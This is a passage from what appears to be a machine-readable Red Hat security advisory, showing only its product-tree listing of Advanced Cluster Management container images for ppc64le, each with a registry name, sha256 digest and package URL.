"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-cli-rhel9@sha256%3A7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"product_id": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cert-policy-controller-rhel9@sha256%3A96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"product_id": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cluster-backup-rhel9-operator@sha256%3A4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-cluster-permission-rhel9@sha256%3A8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"product_id": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/config-policy-controller-rhel9@sha256%3Abe40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le",
"product_id": "registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/console-rhel9@sha256%3Af15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"product_id": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/endpoint-monitoring-rhel9-operator@sha256%3Aeda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-addon-controller-rhel9@sha256%3A7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-framework-addon-rhel9@sha256%3A6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"product_id": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/governance-policy-propagator-rhel9@sha256%3A2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-grafana-rhel9@sha256%3A78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"product_id": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/grafana-dashboard-loader-rhel9@sha256%3Ab5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"product_id": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/insights-client-rhel9@sha256%3Ad739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"product_id": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/insights-metrics-rhel9@sha256%3Ab7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"product_id": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/klusterlet-addon-controller-rhel9@sha256%3Ac13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"product_id": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kube-rbac-proxy-rhel9@sha256%3A263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"product_id": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kube-state-metrics-rhel9@sha256%3A42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"product_id": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/memcached-exporter-rhel9@sha256%3A3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"product_id": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/metrics-collector-rhel9@sha256%3A246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"product_id": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/multicloud-integrations-rhel9@sha256%3A7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-multicluster-observability-addon-rhel9@sha256%3A5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"product_id": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-observability-rhel9-operator@sha256%3A6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-application-rhel9@sha256%3Ae11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-channel-rhel9@sha256%3A7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-subscription-rhel9@sha256%3Ae5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"product_id": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/multiclusterhub-rhel9@sha256%3A8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-must-gather-rhel9@sha256%3A99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"product_id": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/node-exporter-rhel9@sha256%3A8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9@sha256%3A27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9-operator@sha256%3A04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"product_id": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/prometheus-rhel9@sha256%3A7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"product_id": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/prometheus-alertmanager-rhel9@sha256%3Adf47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-config-reloader-rhel9@sha256%3A11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-rhel9@sha256%3A71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"product_id": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/rbac-query-proxy-rhel9@sha256%3A45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"product_id": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/search-collector-rhel9@sha256%3A6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-indexer-rhel9@sha256%3A7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"product": {
